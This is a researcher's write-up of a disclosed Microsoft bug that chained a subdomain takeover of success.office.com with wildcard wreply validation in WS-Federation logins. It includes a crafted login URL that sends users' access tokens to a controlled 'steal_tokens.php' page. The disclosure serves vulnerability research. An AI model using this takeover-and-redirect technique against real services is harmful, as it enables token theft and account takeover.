Leaking access tokens from Microsoft apps chaining two vulnerabilities

First Issue:

During the initial recon I retrieved the list of all possible subdomains of office.com pointing to many Azure instances. One of them was success.office.com which was not getting resolved to any IP address, but had a CNAME pointing to an Azure web app instance successcenter-msprod. Chances are that you can takeover an Azure instance if the domain is not getting resolved to it. So I tried to create a web app with the name successcenter-msprod in my Azure portal and it was accepted as a valid name. In other words, the previous instance with that name had been removed and is now free. Which basically means, whatever we host on successcenter-msprod; success.office.com would point to it as the CNAME record specifies.

Second Issue:

Microsoft uses WS Federation for it’s implementation of a centralized login system for most of the applications including Outlook, Sway, Microsoft Store etc. WS Fed is similar to Oauth. wreply in WS Fed is the counterpart of redirect_url in Oauth. If you read about Nir Goldshlager’s Facebook Oauth bug series, you will understand the dangers of not using an exact URL match (or not properly validating) for wreply or redirect_url wherever possible. Here in this case, Microsoft was allowing any subdomains of office.com (*.office.com) to be a valid wreply URI.

Since one of their subdomain was in my control, I could use the domain as a valid wreply url and was able to leak the access tokens:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1529775349 &rver=6.7.6643.0&wp=MBI_SSL&wreply=https://success.office.com/steal_tokens.php &lc=1033&id=292666&lw=1&fl=easi2&pcexp=true&uictx=me

Basically, if any user who has already been authenticated (or going to authenticate), “clicked” on a crafted link with the above changes, the tokens would get leaked and this token can be exchanged for a session token and subsequently an account takeover would result.

In the below screenshot, you can find the tokens getting leaked to the server I control:

Media Coverage:

This finding has gained some media attention. A few of them are listed below: